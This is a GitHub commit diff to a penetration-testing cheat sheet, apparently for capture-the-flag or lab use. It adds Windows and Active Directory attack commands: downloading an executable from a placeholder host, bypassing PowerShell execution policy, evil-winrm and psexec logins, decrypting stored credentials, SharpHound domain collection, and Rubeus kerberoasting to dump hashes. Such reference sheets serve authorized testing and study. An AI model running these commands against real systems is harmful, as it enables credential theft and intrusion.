Update Cheat Sheet.md

This commit is contained in:
ARZ 2021-03-08 04:24:10 +05:00 committed by GitHub
parent 1ba9e1a96b
commit e49308c98b
No known key found for this signature in database
GPG key ID: 4AEE18F83AFDEB23

View file

@ -229,10 +229,6 @@ dir /a:h `show only hidden files`<br/>
`powershell -c "wget http://<ip>:<port>/<file>" -outfile output.exe`<br />
`powershell Invoke-WebRequest -Uri $ip -OutFile $filepath`
### Active Directory
`powershell -ep bypass` load a powershell shell with execution policy bypassed <br/>
`. .\PowerView.ps1` import the PowerView module
## List Drives
`wmic logicaldisk get caption`
@ -240,6 +236,32 @@ dir /a:h `show only hidden files`<br/>
* $file = Import-Clixml -Path <path_to_file>
* $file.GetNetworkCredential().username
* $file.GetNetworkCredential().password
### Evil-winrm
`evil-winrm -i 10.10.213.169 -u <USER> -p '<PASS>'`
### Psexec.py
` python psexec.py DOMAIN/USER:PASS@IP`
### Active Directory
`powershell -ep bypass` load a powershell shell with execution policy bypassed <br/>
`. .\PowerView.ps1` import the PowerView module
##### Using Bloodhound
* Upload `Sharphound.ps1` (https://github.com/BloodHoundAD/BloodHound/blob/master/Collectors/SharpHound.ps1)
* Then `. .\Sharhound.ps1`
* `Invoke-Bloodhound -CollectionMethod All -Domain DOMAIN-NAME -ZipFileName loot.zip` Domain name can be found by running `Get-ADDomain` and look for result
<img src="https://imgur.com/NxWapei.png"/>
* This command will give an archive which you will have to simply drag and drop on the bloodhound GUI running on your local machine and then quries for kerberoastable accounts or getting more information
##### Using Rubeus
* Download rubeus `https://github.com/r3motecontrol/Ghostpack-CompiledBinaries/blob/master/Rubeus.exe`
* Documentation `https://github.com/GhostPack/Rubeus`
* Transfer rubeus.exe on targeted windows machine and run `.\Rubeus.exe kerberoast /outfile:C:\temp\hash.txt` to get a hash
# Msfvenom
### List All Payloads
msfvenom -l payloads